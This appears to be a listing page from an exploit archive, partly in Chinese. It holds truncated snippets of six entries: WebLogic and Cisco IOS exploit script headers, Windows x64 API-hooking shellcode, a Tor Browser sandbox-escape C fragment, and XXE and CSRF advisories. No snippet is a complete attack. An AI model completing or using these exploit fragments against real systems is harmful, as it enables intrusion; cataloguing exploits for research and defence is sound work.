Oracle WebLogic
from sys import exitfrom requests import postfrom argparse import ArgumentParserfrom random import choicefrom string import ascii_uppercase, ascii_lowercase, digitsfrom xml.sax.saxutils import escape  class Exploit:    &

Cisco IOS - 远程代码执行漏洞
 from scapy.all import * from time import sleep from struct import pack, unpack import random import argparse import sys from termcolor import colored  



Windows/x64 - DeleteFile() API Hooking Shellcode
xor rdx,rdxmov rax,[gs:rdx+0x60] ;PPEBmov rax,[rax+24] ;PPEB->Ldrmov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flinkmov rax,[rsi]mov rsi,[rax]  mov rdi,[rsi+32] ;rdi=kernel32.dll base Address  ;--------------------------------

Apache OpenNLP XXE漏洞(CVE-2017-12620)
CVE-2017-12620 - Apache OpenNLP XXE漏洞 受影响的版本:      OpenNLP 1.5.0到1.5.3      OpenNLP 1.6.0      OpenNLP 1.7.0〜1.7.2      OpenNLP 1.8.0到1.8.1 说明:加载包含XML的模型或字典可能会执

Tor Linux SandBox逃逸
#include <stdlib.h>#include <unistd.h> int main(void){int status;setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1);if (fork() == 0) {execl("/home/amnesia/sandboxed-tor-browser/to

Mongoose Web Server 6.5 CSRF 命令执行
[+] Credits: John Page AKA hyp3rlinx  [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt[+] ISR: apparitionSec